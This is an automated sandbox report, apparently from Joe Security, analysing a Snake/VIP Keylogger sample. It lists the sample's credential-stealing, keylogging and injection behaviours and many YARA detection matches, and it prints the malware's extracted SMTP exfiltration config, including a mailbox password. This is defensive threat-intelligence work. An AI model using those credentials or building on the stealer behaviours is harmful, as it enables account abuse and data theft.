Edit tour

Windows Analysis Report
BgroUcYHpy.exe

Overview

General Information

Sample name:	BgroUcYHpy.exe renamed because original name is a hash value
Original sample name:	d1d603468cbebf5aa215f2a2dce10d9326ab2c913fd5dd6e9ba003884581a335.exe
Analysis ID:	1586030
MD5:	0ee994344a97494cb401ab3d5c8adfc4
SHA1:	e531370efcfd8bd9494d9b19fda321366fcf7a86
SHA256:	d1d603468cbebf5aa215f2a2dce10d9326ab2c913fd5dd6e9ba003884581a335
Tags:	exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

BgroUcYHpy.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\BgroUcYHpy.exe" MD5: 0EE994344A97494CB401AB3D5C8ADFC4)

svchost.exe (PID: 5004 cmdline: "C:\Users\user\Desktop\BgroUcYHpy.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4483603541.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35751:$a1: get_encryptedPassword 0x35725:$a2: get_encryptedUsername 0x357e9:$a3: get_timePasswordChanged 0x35701:$a4: get_passwordField 0x35767:$a5: set_encryptedPassword 0x35534:$a7: get_logins 0x30e72:$a10: KeyLoggerEventArgs 0x30e41:$a11: KeyLoggerEventArgsEventHandler 0x35608:$a13: _encryptedPassword
00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
00000000.00000002.2057269694.0000000001360000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
Process Memory Space: svchost.exe PID: 5004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 5004	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 5004	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 5004	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x978e:$a1: get_encryptedPassword 0x28f2e:$a1: get_encryptedPassword 0x4bc57:$a1: get_encryptedPassword 0x34abe5:$a1: get_encryptedPassword 0x9762:$a2: get_encryptedUsername 0x28f02:$a2: get_encryptedUsername 0x4bc2b:$a2: get_encryptedUsername 0x34abb9:$a2: get_encryptedUsername 0x9826:$a3: get_timePasswordChanged 0x28fc6:$a3: get_timePasswordChanged 0x4bcef:$a3: get_timePasswordChanged 0x34ac7d:$a3: get_timePasswordChanged 0x973e:$a4: get_passwordField 0x28ede:$a4: get_passwordField 0x4bc07:$a4: get_passwordField 0x34ab95:$a4: get_passwordField 0x97a4:$a5: set_encryptedPassword 0x28f44:$a5: set_encryptedPassword 0x4bc6d:$a5: set_encryptedPassword 0x34abfb:$a5: set_encryptedPassword 0x957a:$a7: get_logins
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
2.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.svchost.exe.7940f20.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7940f20.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7940f20.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7940f20.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7940f20.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.7940f20.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7940f20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.2.svchost.exe.7d00000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7d00000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7d00000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7d00000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7d00000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.7d00000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7d00000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.2.svchost.exe.7940f20.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7940f20.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7940f20.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7940f20.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.7940f20.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7940f20.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
2.2.svchost.exe.7940000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7940000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7940000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7940000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.3259f20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.3259f20.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.3259f20.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.3259f20.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.3.svchost.exe.3259f20.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.3259f20.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.3374f2e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.3374f2e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.3.svchost.exe.3259000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.3259000.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.3.svchost.exe.3259000.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.3259000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.3259000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
2.3.svchost.exe.3259000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.3259000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
2.2.svchost.exe.7940000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
2.2.svchost.exe.7940000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7940000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
2.3.svchost.exe.3259000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.3259000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.3259000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.3259000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33943:$a1: get_encryptedPassword 0x33917:$a2: get_encryptedUsername 0x339db:$a3: get_timePasswordChanged 0x338f3:$a4: get_passwordField 0x33959:$a5: set_encryptedPassword 0x33726:$a7: get_logins 0x2f064:$a10: KeyLoggerEventArgs 0x2f033:$a11: KeyLoggerEventArgsEventHandler 0x337fa:$a13: _encryptedPassword
2.3.svchost.exe.3259000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d696:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf96:$a4: \Orbitum\User Data\Default\Login Data 0x3d975:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.3259000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x314cf:$s1: UnHook 0x3146b:$s2: SetHook 0x314a4:$s3: CallNextHook 0x31433:$s4: _hook
